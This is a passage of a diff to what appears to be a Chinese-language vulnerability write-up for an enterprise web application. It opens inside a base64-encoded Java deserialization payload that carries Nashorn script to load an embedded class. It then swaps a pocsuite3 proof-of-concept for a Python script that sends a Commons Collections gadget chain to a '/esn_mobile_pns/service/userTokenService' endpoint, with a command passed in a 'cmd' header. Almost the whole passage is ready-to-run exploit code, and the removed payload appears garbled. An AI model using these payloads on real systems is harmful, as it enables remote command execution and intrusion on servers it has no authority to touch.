em9PR1F5MkFBa1NMQVM5QUNCWkE3SUFMVk8yQUNFWkRBUzlBQ0paQTdzQUxsa1JBTWkzQUM5VHRnQWpWeW9TTUxZQU1Ub1BHUSsyQURJNkJ4a1BFak1HdlFBZ1dRT3lBRFRIQUE4U05iZ0FKMW16QURTbkFBYXlBRFJUV1FTeUFDMVRXUVd5QUMxVHRnQTJHUWNHdlFBaVdRTVpEbE5aQkxzQUxsa0R0d0F2VTFrRnV3QXVXUmtPdnJjQUwxTzJBQ05YR1F5MkFBa1NOd1M5QUNCWkF4a1BVN1lBSVJrTUJMMEFJbGtER1FkVHRnQWpWNmNBWWpvUEtoSTV0Z0F4T2hBWkVCSTZCTDBBSUZrRHNnQTB4d0FQRWpXNEFDZFpzd0EwcHdBR3NnQTBVN1lBTmhrUUJMMEFJbGtER1E1VHRnQWpPZ2NaRExZQUNSSTNCTDBBSUZrREdSQlR0Z0FoR1F3RXZRQWlXUU1aQjFPMkFDTlhwd0FYaEFrQnAvNVNwd0FJT2dhbkFBT0VCQUduL1Z5eEFBZ0Fsd0NpQUtVQUZ3REZBTk1BMWdBWEFkQUNWd0phQURnQU5nQTdBc1VBT0FBK0FGa0N4UUE0QUZ3QWZBTEZBRGdBZndLNUFzVUFPQUs4QXNJQ3hRQTRBQUVBaGdBQUFPNEFPd0FBQUEwQUJBQU9BQXNBRHdBVkFCQUFHZ0FSQUNZQUV3QXdBQlFBTmdBV0FENEFGd0JGQUJnQVhBQVpBR2NBR2dCc0FCc0FkQUFjQUg4QUhRQ0tBQjRBandBZkFKY0FJUUNpQUNRQXBRQWlBS2NBSXdDNEFDVUF2UUFtQU1VQUtBRFRBQ3NBMWdBcEFOZ0FLZ0RqQUN3QTZBQXRBUEFBTGdEN0FDOEJBQUF3QVE0QU1RRWRBRElCS0FBekFUTUFOQUU0QURVQlFBQTJBVmtBTndHU0FEZ0Jsd0E1QVpvQU93R2xBRHdCMEFBK0FkZ0FQd0hmQUVBQ05RQkJBbGNBUmdKYUFFSUNYQUJEQW1RQVJBS1hBRVVDdVFCSEFyd0FNUUxDQUVzQ3hRQkpBc2NBU2dMS0FCTUMwQUJOQUljQUFBQUVBQUVBT0FBQkFJZ0FpUUFDQUlVQUFBQTVBQUlBQXdBQUFCRXJ1QUFCc0UyNEFBZTJBRHNydGdBOHNBQUJBQUFBQkFBRkFBSUFBUUNHQUFBQURnQURBQUFBVndBRkFGZ0FCZ0JaQUljQUFBQUVBQUVBQWdBQkFJb0Fpd0FCQUlVQUFBQ1BBQVFBQXdBQUFGY3J4Z0FNRWowcnRnQSttUUFHRWord0s3WUFRRXdyRWtHMkFFS1pBQ2dyRWtFU1BiWUFReEpFdGdCRlRTeStCWjhBQmhKR3NDb3NBeklzQkRLNEFFZTJBRWl3S2lzU1FSSTl0Z0JERWtrU1BiWUFRN1lBU3JBQUFBQUJBSVlBQUFBbUFBa0FBQUJqQUEwQVpBQVFBR1lBRlFCbkFCNEFhUUFzQUdvQU1nQnJBRFVBYlFCREFHOEFBUUNNQUlzQUFRQ0ZBQUFCeWdBRUFBa0FBQUVxRWt1NEFFeTJBRTFOSzdZQVFFd0JUZ0U2QkN3U1RyWUFFWmtBUUNzU1Q3WUFFWmtBSUNzU1VMWUFFWm9BRjdzQVVWbTNBRklydGdCVEVsUzJBRk8yQUZWTUJyMEFLVmtERWloVFdRUVNWbE5aQlN0VE9nU25BRDByRWsrMkFCR1pBQ0FyRWxDMkFCR2FBQmU3QUZGWnR3QlNLN1lBVXhKWHRnQlR0Z0JWVEFhOUFDbFpBeEpZVTFrRUVsbFRXUVVyVXpvRXVBQmFHUVMyQUZ0T3V3QmNXUzIyQUYyM0FGNFNYN1lBWURvRkdRVzJBR0daQUFzWkJiWUFZcWNBQlJJOU9nYTdBRnhaTGJZQVk3Y0FYaEpmdGdCZ09nVzdBRkZadHdCU0dRYTJBRk1aQmJZQVlaa0FDeGtGdGdCaXB3QUZFajIyQUZPMkFGVTZCaGtHT2djdHhnQUhMYllBWkJrSHNEb0ZHUVcyQUdVNkJpM0dBQWN0dGdCa0dRYXdPZ2d0eGdBSExiWUFaQmtJdndBRUFKTUEvZ0VKQURnQWt3RCtBUjBBQUFFSkFSSUJIUUFBQVIwQkh3RWRBQUFBQVFDR0FBQUFiZ0FiQUFBQWN3QUpBSFFBRGdCMUFCQUFkZ0FUQUhjQUhBQjRBQzRBZVFCQ0FIc0FXUUI5QUdzQWZnQi9BSUFBa3dDREFKd0FoQUN1QUlVQXdnQ0dBTlFBaHdENkFJZ0EvZ0NNQVFJQWpRRUdBSWdCQ1FDSkFRc0FpZ0VTQUl3QkZnQ05BUm9BaWdFZEFJd0JJd0NOQUFFQWpRQ09BQUVBaFFBQUFZTUFCQUFNQUFBQTh4Skx1QUJNdGdCTkVrNjJBQkdhQUJDN0FDbFpFbWEzQUdkT3B3QU51d0FwV1JKb3R3Qm5UcmdBV2kyMkFHazZCTHNBYWxrckxMWUFhN2NBYkRvRkdRUzJBRjA2QmhrRXRnQmpPZ2NaQmJZQWJUb0lHUVMyQUc0NkNSa0Z0Z0J2T2dvWkJiWUFjSm9BWUJrR3RnQnhuZ0FRR1FvWkJyWUFjcllBYzZmLzdoa0h0Z0J4bmdBUUdRb1pCN1lBY3JZQWM2Zi83aGtJdGdCeG5nQVFHUWtaQ0xZQWNyWUFjNmYvN2hrS3RnQjBHUW0yQUhRVUFIVzRBSGNaQkxZQWVGZW5BQWc2QzZmL25oa0V0Z0JrR1FXMkFIbW5BQ0JPdXdCUldiY0FVaEo2dGdCVExiWUFlN1lBVXhKOHRnQlR0Z0JWc0JKOXNBQUNBTGdBdmdEQkFEZ0FBQURRQU5NQU9BQUJBSVlBQUFCdUFCc0FBQUNiQUJBQW5BQWRBSjRBSndDZ0FEQUFvUUErQUtJQVV3Q2pBR0VBcEFCcEFLVUFjUUNtQUg0QXFBQ0dBS2tBa3dDckFKc0FyQUNvQUs0QXJRQ3ZBTElBc0FDNEFMSUF2Z0N6QU1FQXRBRERBTFVBeGdDM0FNc0F1QURRQUxzQTB3QzVBTlFBdWdEd0FMd0FDQUNQQUlrQUFnQ0ZBQUFBTWdBREFBSUFBQUFTS3JnQUFiQk11d0FEV1N1MkFBUzNBQVcvQUFFQUFBQUVBQVVBQWdBQkFJWUFBQUFHQUFFQUFBQTNBSUVBQUFBQUFBRUFrQUFBQUFJQWtRPT0iOwpjbHogPSBkZWZpbmVDbGFzcyhiYXNlNjREZWNvZGVUb0J5dGUoY29kZSkpOwpjbHoubmV3SW5zdGFuY2UoKTt0AARldmFsdXEAfgAbAAAAAXEAfgAjc3IAEWphdmEudXRpbC5IYXNoTWFwBQfawcMWYNEDAAJGAApsb2FkRmFjdG9ySQAJdGhyZXNob2xkeHA/QAAAAAAAAHcIAAAAEAAAAAB4eHg=")}}
 ```
 
-## 批量检测脚本
+## 检测脚本
 ```python
-#!/usr/bin/env python
-
-# coding: utf-8
-
-
-
-from pocsuite3.api import (
-
-    POCBase, Output, register_poc, logger, requests, OptDict, OptString, VUL_TYPE,
-
-    REVERSE_PAYLOAD, POC_CATEGORY
-
-)
-
-
-
-class POC(POCBase):
-
-    vulID = '1'
-
-    version = '1'
-
-    author = ['AuthorName']
-
-    vulDate = '2023-08-15'
-
-    createDate = '2023-08-15'
-
-    updateDate = '2023-08-15'
-
-    references = ['']
-
-    name = 'POC Name'
-
-    appPowerLink = ''
-
-    appName = 'Application Name'
-
-    appVersion = ''
-
-    vulType = VUL_TYPE.COMMAND_EXECUTION
-
-    desc = '''
-
-        Description of the vulnerability.
-
-    '''
-
-    samples = ['']
-
-    install_requires = ['']
-
-    pocDesc = '''
-
-    How to use the POC.
-
-    '''
-
-    category = POC_CATEGORY.EXPLOITS.REMOTE
-
-
-
-    def _verify(self):
-
-        result = {}
-
-        path = '/esn_mobile_pns/service/userTokenService'
-
-        headers = {
-
-            "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",
-
-            'Connection': 'close',
-
-            'Content-Type': 'application/x-www-form-urlencoded',
-
-            'Accept-Encoding': 'gzip, deflate',
-
-            'cmd': '@@@@@echo Test',
-
-        }
-
-        data = '''{{base64dec(rO0ABXNyABFqYXZhLnV0aWwuSGFzaFNldLpEhZWWuLc0AwAAeHB3DAAAAAI/QAAAAAAAAXNyADRvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMua2V5dmFsdWUuVGllZE1hcEVudHJ5iq3SmznBH9sCAAJMAANrZXl0ABJMamF2YS9sYW5nL09iamVjdDtMAANtYXB0AA9MamF2YS91dGlsL01hcDt4cHQAA2Zvb3NyACpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMubWFwLkxhenlNYXBu5ZSCnnkQlAMAAUwAB2ZhY3Rvcnl0ACxMb3JnL2FwYWNoZS9jb21tb25zL2NvbGxlY3Rpb25zL1RyYW5zZm9ybWVyO3hwc3IAOm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5mdW5jdG9ycy5DaGFpbmVkVHJhbnNmb3JtZXIwx5fsKHqXBAIAAVsADWlUcmFuc2Zvcm1lcnN0AC1bTG9yZy9hcGFjaGUvY29tbW9ucy9jb2xsZWN0aW9ucy9UcmFuc2Zvcm1lcjt4cHVyAC1bTG9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5UcmFuc2Zvcm1lcju9Virx2DQYmQIAAHhwAAAABHNyADtvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuQ29uc3RhbnRUcmFuc2Zvcm1lclh2kBFBArGUAgABTAAJaUNvbnN0YW50cQB+AAN4cHZyACBqYXZheC5zY3JpcHQuU2NyaXB0RW5naW5lTWFuYWdlcgAAAAAAAAAAAAAAeHBzcgA6b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkludm9rZXJUcmFuc2Zvcm1lcofo/2t7fM44AgADWwAFaUFyZ3N0ABNbTGphdmEvbGFuZy9PYmplY3Q7TAALaU1ldG
-
-hvZHQAEkxqYXZhL2xhbmcvU3RyaW5nO1sAC2lNZXRob2RxAH4ACnhyACBqYXZheC5zY3JpcHQuU2NyaXB0RW5naW5lTWFuYWdlcgAAAAAAAAAACnQAGVJGOkpNb2RlbFJlc3VsdHQAG0xqYXZhL2xhbmcvU3RyaW5nO3hwc3EAfgAKc3IAJm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5rZXl2YWx1ZS5UaWVkTWFwRW50cnlUiqsSmzlVCAIAAUwAA21hcHQAQkxqYXZhL2xhbmcvT2JqZWN0O3hwc3IAFGphdmEubGFuZy5PYmplY3QAAAAAAAAAAAAAAHhwc3EAfgAJeHBzcgA6b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkNvbnN0YW50VHJhbnNmb3JtZXJUcmFuc2Zvcm1lcrN5Y+2Zs1QDAAB4cHcEAAAAAHg=
-
-'''
-
-        response = requests.post(self.url + path, headers=headers, data=data)
-
-        if response.status_code == 200 and "Test" in response.text:
-
-            result['VerifyInfo'] = {}
-
-            result['VerifyInfo']['URL'] = self.url + path
-
-            result['VerifyInfo']['Payload'] = headers['cmd']
-
-        return self.parse_output(result)
-
-
-
-    def _attack(self):
-
-        return self._verify()
-
-
-
-    def _parse_output(self, output):
-
-        parsed_output = Output(self)
-
-        if output:
-
-            parsed_output.success(output)
-
-        else:
-
-            parsed_output.fail("Exploit failed. Target is not vulnerable.")
-
-        return parsed_output
-
-
-
-register_poc(POC)
+import requests
+import urllib3
+import sys
+import time
+import json
+import re
+import urllib
+import base64
+
+urllib3.disable_warnings()
+
+def verify(site):
+    burp0_url = site + "/esn_mobile_pns/service/userTokenService"
+    headers = {
+        "Content-Type":"application/x-www-form-urlencoded",
+        "cmd":"@@@@@ver"
+    }    
+    raw_data = base64.b64decode("rO0ABXNyABFqYXZhLnV0aWwuSGFzaFNldLpEhZWWuLc0AwAAeHB3DAAAAAI/QAAAAAAAAXNyADRvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMua2V5dmFsdWUuVGllZE1hcEVudHJ5iq3SmznBH9sCAAJMAANrZXl0ABJMamF2YS9sYW5nL09iamVjdDtMAANtYXB0AA9MamF2YS91dGlsL01hcDt4cHQAA2Zvb3NyACpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMubWFwLkxhenlNYXBu5ZSCnnkQlAMAAUwAB2ZhY3Rvcnl0ACxMb3JnL2FwYWNoZS9jb21tb25zL2NvbGxlY3Rpb25zL1RyYW5zZm9ybWVyO3hwc3IAOm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5mdW5jdG9ycy5DaGFpbmVkVHJhbnNmb3JtZXIwx5fsKHqXBAIAAVsADWlUcmFuc2Zvcm1lcnN0AC1bTG9yZy9hcGFjaGUvY29tbW9ucy9jb2xsZWN0aW9ucy9UcmFuc2Zvcm1lcjt4cHVyAC1bTG9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5UcmFuc2Zvcm1lcju9Virx2DQYmQIAAHhwAAAABHNyADtvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuQ29uc3RhbnRUcmFuc2Zvcm1lclh2kBFBArGUAgABTAAJaUNvbnN0YW50cQB+AAN4cHZyACBqYXZheC5zY3JpcHQuU2NyaXB0RW5naW5lTWFuYWdlcgAAAAAAAAAAAAAAeHBzcgA6b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkludm9rZXJUcmFuc2Zvcm1lcofo/2t7fM44AgADWwAFaUFyZ3N0ABNbTGphdmEvbGFuZy9PYmplY3Q7TAALaU1ldGhvZE5hbWV0ABJMamF2YS9sYW5nL1N0cmluZztbAAtpUGFyYW1UeXBlc3QAEltMamF2YS9sYW5nL0NsYXNzO3hwdXIAE1tMamF2YS5sYW5nLk9iamVjdDuQzlifEHMpbAIAAHhwAAAAAHQAC25ld0luc3RhbmNldXIAEltMamF2YS5sYW5nLkNsYXNzO6sW167LzVqZAgAAeHAAAAAAc3EAfgATdXEAfgAYAAAAAXQAAmpzdAAPZ2V0RW5naW5lQnlOYW1ldXEAfgAbAAAAAXZyABBqYXZhLmxhbmcuU3RyaW5noPCkOHo7s0ICAAB4cHNxAH4AE3VxAH4AGAAAAAF0LWx0cnkgewogIGxvYWQoIm5hc2hvcm46bW96aWxsYV9jb21wYXQuanMiKTsKfSBjYXRjaCAoZSkge30KZnVuY3Rpb24gZ2V0VW5zYWZlKCl7CiAgdmFyIHRoZVVuc2FmZU1ldGhvZCA9IGphdmEubGFuZy5DbGFzcy5mb3JOYW1lKCJzdW4ubWlzYy5VbnNhZmUiKS5nZXREZWNsYXJlZEZpZWxkKCd0aGVVbnNhZmUnKTsKICB0aGVVbnNhZmVNZXRob2Quc2V0QWNjZXNzaWJsZSh0cnVlKTsgCiAgcmV0dXJuIHRoZVVuc2FmZU1ldGhvZC5nZXQobnVsbCk7Cn0KZnVuY3Rpb24gcmVtb3ZlQ2xhc3NDYWNoZShjbGF6eil7CiAgdmFyIHVuc2FmZSA9IGdldFVuc2FmZSgpOwogIHZhciBjbGF6ekFub255bW91c0NsYXNzID0gdW5zYWZlLmRlZmluZUFub255bW91c0NsYXNzKGNsYXp6LGphdmEubGFuZy5DbGFzcy5mb3JOYW1lKCJqYXZhLmxhbmcuQ2xhc3MiKS5nZXRSZXNvdXJjZUFzU3RyZWFtKCJDbGFzcy5jbGFzcyIpLnJlYWRBbGxCeXRlcygpLG51bGwpOwogIHZhciByZWZsZWN0aW9uRGF0YUZpZWxkID0gY2xhenpBbm9ueW1vdXNDbGFzcy5nZXREZWNsYXJlZEZpZWxkKCJyZWZsZWN0aW9uRGF0YSIpOwogIHVuc2FmZS5wdXRPYmplY3QoY2xhenosdW5zYWZlLm9iamVjdEZpZWxkT2Zmc2V0KHJlZmxlY3Rpb25EYXRhRmllbGQpLG51bGwpOwp9CmZ1bmN0aW9uIGJ5cGFzc1JlZmxlY3Rpb25GaWx0ZXIoKSB7CiAgdmFyIHJlZmxlY3Rpb25DbGFzczsKICB0cnkgewogICAgcmVmbGVjdGlvbkNsYXNzID0gamF2YS5sYW5nLkNsYXNzLmZvck5hbWUoImpkay5pbnRlcm5hbC5yZWZsZWN0LlJlZmxlY3Rpb24iKTsKICB9IGNhdGNoIChlcnJvcikgewogICAgcmVmbGVjdGlvbkNsYXNzID0gamF2YS5sYW5nLkNsYXNzLmZvck5hbWUoInN1bi5yZWZsZWN0LlJlZmxlY3Rpb24iKTsKICB9CiAgdmFyIHVuc2FmZSA9IGdldFVuc2FmZSgpOwogIHZhciBjbGFzc0J1ZmZlciA9IHJlZmxlY3Rpb25DbGFzcy5nZXRSZXNvdXJjZUFzU3RyZWFtKCJSZWZsZWN0aW9uLmNsYXNzIikucmVhZEFsbEJ5dGVzKCk7CiAgdmFyIHJlZmxlY3Rpb25Bbm9ueW1vdXNDbGFzcyA9IHVuc2FmZS5kZWZpbmVBbm9ueW1vdXNDbGFzcyhyZWZsZWN0aW9uQ2xhc3MsIGNsYXNzQnVmZmVyLCBudWxsKTsKICB2YXIgZmllbGRGaWx0ZXJNYXBGaWVsZCA9IHJlZmxlY3Rpb25Bbm9ueW1vdXNDbGFzcy5nZXREZWNsYXJlZEZpZWxkKCJmaWVsZEZpbHRlck1hcCIpOwogIHZhciBtZXRob2RGaWx0ZXJNYXBGaWVsZCA9IHJlZmxlY3Rpb25Bbm9ueW1vdXNDbGFzcy5nZXREZWNsYXJlZEZpZWxkKCJtZXRob2RGaWx0ZXJNYXAiKTsKICBpZiAoZmllbGRGaWx0ZXJNYXBGaWVsZC5nZXRUeXBlKCkuaXNBc3NpZ25hYmxlRnJvbShqYXZhLmxhbmcuQ2xhc3MuZm9yTmFtZSgiamF2YS51dGlsLkhhc2hNYXAiKSkpIHsKICAgIHVuc2FmZS5wdXRPYmplY3QocmVmbGVjdGlvbkNsYXNzLCB1bnNhZmUuc3RhdGljRmllbGRPZmZzZXQoZmllbGRGaWx0ZXJNYXBGaWVsZCksIGphdmEubGFuZy5DbGFzcy5mb3JOYW1lKCJqYXZhLnV0aWwuSGFzaE1hcCIpLmdldENvbnN0cnVjdG9yKCkubmV3SW5zdGFuY2UoKSk7CiAgfQogIGlmIChtZXRob2RGaWx0ZXJNYXBGaWVsZC5nZXRUeXBlKCkuaXNBc3NpZ25hYmxlRnJvbShqYXZhLmxhbmcuQ2xhc3MuZm9yTmFtZSgiamF2YS51dGlsLkhhc2hNYXAiKSkpIHsKICAgIHVuc2FmZS5wdXRPYmplY3QocmVmbGVjdGlvbkNsYXNzLCB1bnNhZmUuc3RhdGljRmllbGRPZmZzZXQobWV0aG9kRmlsdGVyTWFwRmllbGQpLCBqYXZhLmxhbmcuQ2xhc3MuZm9yTmFtZSgiamF2YS51dGlsLkhhc2hNYXAiKS5nZXRDb25zdHJ1Y3RvcigpLm5ld0luc3RhbmNlKCkpOwogIH0KICByZW1vdmVDbGFzc0NhY2hlKGphdmEubGFuZy5DbGFzcy5mb3JOYW1lKCJqYXZhLmxhbmcuQ2xhc3MiKSk7Cn0KZnVuY3Rpb24gc2V0QWNjZXNzaWJsZShhY2Nlc3NpYmxlT2JqZWN0KXsKICAgIHZhciB1bnNhZmUgPSBnZXRVbnNhZmUoKTsKICAgIHZhciBvdmVycmlkZUZpZWxkID0gamF2YS5sYW5nLkNsYXNzLmZvck5hbWUoImphdmEubGFuZy5yZWZsZWN0LkFjY2Vzc2libGVPYmplY3QiKS5nZXREZWNsYXJlZEZpZWxkKCJvdmVycmlkZSIpOwogICAgdmFyIG9mZnNldCA9IHVuc2FmZS5vYmplY3RGaWVsZE9mZnNldChvdmVycmlkZUZpZWxkKTsKICAgIHVuc2FmZS5wdXRCb29sZWFuKGFjY2Vzc2libGVPYmplY3QsIG9mZnNldCwgdHJ1ZSk7Cn0KZnVuY3Rpb24gZGVmaW5lQ2xhc3MoYnl0ZXMpewogIHZhciBjbHogPSBudWxsOwogIHZhciB2ZXJzaW9uID0gamF2YS5sYW5nLlN5c3RlbS5nZXRQcm9wZXJ0eSgiamF2YS52ZXJzaW9uIik7CiAgdmFyIHVuc2FmZSA9IGdldFVuc2FmZSgpCiAgdmFyIGNsYXNzTG9hZGVyID0gbmV3IGphdmEubmV0LlVSTENsYXNzTG9hZGVyKGphdmEubGFuZy5yZWZsZWN0LkFycmF5Lm5ld0luc3RhbmNlKGphdmEubGFuZy5DbGFzcy5mb3JOYW1lKCJqYXZhLm5ldC5VUkwiKSwgMCkpOwogIHRyeXsKICAgIGlmICh2ZXJzaW9uLnNwbGl0KCIuIilbMF0gPj0gMTEpIHsKICAgICAgYnlwYXNzUmVmbGVjdGlvbkZpbHRlcigpOwogICAgZGVmaW5lQ2xhc3NNZXRob2QgPSBqYXZhLmxhbmcuQ2xhc3MuZm9yTmFtZSgiamF2YS5sYW5nLkNsYXNzTG9hZGVyIikuZ2V0RGVjbGFyZWRNZXRob2QoImRlZmluZUNsYXNzIiwgamF2YS5sYW5nLkNsYXNzLmZvck5hbWUoIltCIiksamF2YS5sYW5nLkludGVnZXIuVFlQRSwgamF2YS5sYW5nLkludGVnZXIuVFlQRSk7CiAgICBzZXRBY2Nlc3NpYmxlKGRlZmluZUNsYXNzTWV0aG9kKTsKICAgIC8vIOe7lei/hyBzZXRBY2Nlc3NpYmxlIAogICAgY2x6ID0gZGVmaW5lQ2xhc3NNZXRob2QuaW52b2tlKGNsYXNzTG9hZGVyLCBieXRlcywgMCwgYnl0ZXMubGVuZ3RoKTsKICAgIH1lbHNlewogICAgICB2YXIgcHJvdGVjdGlvbkRvbWFpbiA9IG5ldyBqYXZhLnNlY3VyaXR5LlByb3RlY3Rpb25Eb21haW4obmV3IGphdmEuc2VjdXJpdHkuQ29kZVNvdXJjZShudWxsLCBqYXZhLmxhbmcucmVmbGVjdC5BcnJheS5uZXdJbnN0YW5jZShqYXZhLmxhbmcuQ2xhc3MuZm9yTmFtZSgiamF2YS5zZWN1cml0eS5jZXJ0LkNlcnRpZmljYXRlIiksIDApKSwgbnVsbCwgY2xhc3NMb2FkZXIsIFtdKTsKICAgICAgY2x6ID0gdW5zYWZlLmRlZmluZUNsYXNzKG51bGwsIGJ5dGVzLCAwLCBieXRlcy5sZW5ndGgsIGNsYXNzTG9hZGVyLCBwcm90ZWN0aW9uRG9tYWluKTsKICAgIH0KICB9Y2F0Y2goZXJyb3IpewogICAgZXJyb3IucHJpbnRTdGFja1RyYWNlKCk7CiAgfWZpbmFsbHl7CiAgICByZXR1cm4gY2x6OwogIH0KfQpmdW5jdGlvbiBiYXNlNjREZWNvZGVUb0J5dGUoc3RyKSB7CiAgdmFyIGJ0OwogIHRyeSB7CiAgICBidCA9IGphdmEubGFuZy5DbGFzcy5mb3JOYW1lKCJzdW4ubWlzYy5CQVNFNjREZWNvZGVyIikubmV3SW5zdGFuY2UoKS5kZWNvZGVCdWZmZXIoc3RyKTsKICB9IGNhdGNoIChlKSB7CiAgICBidCA9IGphdmEubGFuZy5DbGFzcy5mb3JOYW1lKCJqYXZhLnV0aWwuQmFzZTY0IikubmV3SW5zdGFuY2UoKS5nZXREZWNvZGVyKCkuZGVjb2RlKHN0cik7CiAgfQogIHJldHVybiBidDsKfQp2YXIgY29kZT0ieXY2NnZnQUFBQzhCWndvQUlBQ1NCd0NUQndDVUNnQUNBSlVLQUFNQWxnb0FJZ0NYQ2dDWUFKa0tBSmdBbWdvQUlnQ2JDQUNjQ2dBZ0FKMEtBSjRBbndvQW5nQ2dCd0NoQ2dDWUFLSUlBSXdLQUNrQW93Z0FwQWdBcFFjQXBnZ0Fwd2dBcUFjQXFRb0FJQUNxQ0FDckNBQ3NCd0N0Q3dBYkFLNExBQnNBcndnQXNBZ0FzUWNBc2dvQUlBQ3pCd0MwQ2dDMUFMWUlBTGNKQUg0QXVBZ0F1UW9BZmdDNkNBQzdCd0M4Q2dCK0FMMEtBQ2tBdmdnQXZ3a0FMZ0RBQndEQkNnQXVBTUlJQU1NS0FINEF4QW9BSUFERkNBREdDUUIrQU1jSUFNZ0tBQ0FBeVFnQXlnY0F5d2dBekFnQXpRb0FtQURPQ2dEUEFNUUlBTkFLQUNrQTBRZ0EwZ29BS1FEVENBRFVDZ0FwQU5VS0FDa0ExZ2dBMXdvQUtRRFlDQURaQ2dBdUFOb0tBSDRBMndnQTNBb0FmZ0RkQ0FEZUNnRGZBT0FLQUNrQTRRZ0E0Z2dBNHdnQTVBY0E1UW9BVVFDWENnQlJBT1lJQU9jS0FGRUE2QWdBNlFnQTZnZ0E2d2dBN0FvQTdRRHVDZ0R0QU84SEFQQUtBUEVBOGdvQVhBRHpDQUQwQ2dCY0FQVUtBRndBOWdvQVhBRDNDZ0R4QVBnS0FQRUErUW9BT0FEb0NBRDZDZ0FwQUpZSUFQc0tBTzBBL0FjQS9Rb0FMZ0QrQ2dCcUFQOEtBR29BOGdvQThRRUFDZ0JxQVFBS0FHb0JBUW9CQWdFRENnRUNBUVFLQVFVQkJnb0JCUUVIQlFBQUFBQUFBQUF5Q2dDWUFRZ0tBUEVCQ1FvQWFnRUtDQUVMQ2dBNEFKVUlBUXdJQVEwSEFRNEJBQlpqYkdGemN5UnFZWFpoSkd4aGJtY2tVM1J5YVc1bkFRQVJUR3BoZG1FdmJHRnVaeTlEYkdGemN6c0JBQWxUZVc1MGFHVjBhV01CQUFkaGNuSmhlU1JDQVFBR1BHbHVhWFErQVFBREtDbFdBUUFFUTI5a1pRRUFEMHhwYm1WT2RXMWlaWEpVWVdKc1pRRUFDa1Y0WTJWd2RHbHZibk1CQUFsc2IyRmtRMnhoYzNNQkFDVW9UR3BoZG1FdmJHRnVaeTlUZEhKcGJtYzdLVXhxWVhaaEwyeGhibWN2UTJ4aGMzTTdBUUFIWlhobFkzVjBaUUVBSmloTWFtRjJZUzlzWVc1bkwxTjBjbWx1WnpzcFRHcGhkbUV2YkdGdVp5OVRkSEpwYm1jN0FRQUVaWGhsWXdFQUIzSmxkbVZ5YzJVQkFEa29UR3BoZG1FdmJHRnVaeTlUZEhKcGJtYzdUR3BoZG1FdmJHRnVaeTlKYm5SbFoyVnlPeWxNYW1GMllTOXNZVzVuTDFOMGNtbHVaenNCQUFaamJHRnpjeVFCQUFwVGIzVnlZMlZHYVd4bEFRQUhRVFF1YW1GMllRd0JEd0NKQVFBZ2FtRjJZUzlzWVc1bkwwTnNZWE56VG05MFJtOTFibVJGZUdObGNIUnBiMjRCQUI1cVlYWmhMMnhoYm1jdlRtOURiR0Z6YzBSbFprWnZkVzVrUlhKeWIzSU1BUkFCRVF3QWd3RVNEQUNEQUlRSEFSTU1BUlFCRlF3QkZnRVhEQUVZQVJrQkFBZDBhSEpsWVdSekRBRWFBUnNIQVJ3TUFSMEJIZ3dCSHdFZ0FRQVRXMHhxWVhaaEwyeGhibWN2VkdoeVpXRmtPd3dCSVFFUkRBRWlBU01CQUFSb2RIUndBUUFHZEdGeVoyVjBBUUFTYW1GMllTOXNZVzVuTDFKMWJtNWhZbXhsQVFBR2RHaHBjeVF3QVFBSGFHRnVaR3hsY2dFQUhtcGhkbUV2YkdGdVp5OU9iMU4xWTJoR2FXVnNaRVY0WTJWd2RHbHZiZ3dCSkFFWkFRQUdaMnh2WW1Gc0FRQUtjSEp2WTJWemMyOXljd0VBRG1waGRtRXZkWFJwYkM5TWFYTjBEQUVsQVNZTUFSOEJKd0VBQTNKbGNRRUFDMmRsZEZKbGMzQnZibk5sQVFBUGFtRjJZUzlzWVc1bkwwTnNZWE56REFFb0FTa0JBQkJxWVhaaEwyeGhibWN2VDJKcVpXTjBCd0VxREFFckFTd0JBQWxuWlhSSVpXRmtaWElNQUg4QWdBRUFFR3BoZG1FdWJHRnVaeTVUZEhKcGJtY01BSThBaVFFQUEyTnRaQUVBRUdwaGRtRXZiR0Z1Wnk5VGRISnBibWNNQUlvQWl3d0JMUUV1QVFBSmMyVjBVM1JoZEhWekRBRXZBSUFCQUJGcVlYWmhMMnhoYm1jdlNXNTBaV2RsY2d3QWd3RXdBUUFrYjNKbkxtRndZV05vWlM1MGIyMWpZWFF1ZFhScGJDNWlkV1l1UW5sMFpVTm9kVzVyREFDSUFJa01BVEVCTWdFQUNITmxkRUo1ZEdWekRBQ0NBSUFCQUFKYlFnd0JNd0VwQVFBSFpHOVhjbWwwWlFFQUUycGhkbUV2YkdGdVp5OUZlR05sY0hScGIyNEJBQk5xWVhaaExtNXBieTVDZVhSbFFuVm1abVZ5QVFBRWQzSmhjQXdCTkFFMUJ3RTJBUUFBREFFM0FUZ0JBQkJqYjIxdFlXNWtJRzV2ZENCdWRXeHNEQUU1QVJFQkFBVWpJeU1qSXd3Qk9nRTdEQUU4QVQwQkFBRTZEQUUrQVQ4QkFDSmpiMjF0WVc1a0lISmxkbVZ5YzJVZ2FHOXpkQ0JtYjNKdFlYUWdaWEp5YjNJaERBRkFBVUVNQUkwQWpnRUFCVUJBUUVCQURBQ01BSXNCQUFkdmN5NXVZVzFsQndGQ0RBRkRBSXNNQVVRQkVRRUFBM2RwYmdFQUJIQnBibWNCQUFJdGJnRUFGbXBoZG1FdmJHRnVaeTlUZEhKcGJtZENkV1ptWlhJTUFVVUJSZ0VBQlNBdGJpQTBEQUZIQVJFQkFBSXZZd0VBQlNBdGRDQTBBUUFDYzJnQkFBSXRZd2NCU0F3QlNRRktEQUNNQVVzQkFCR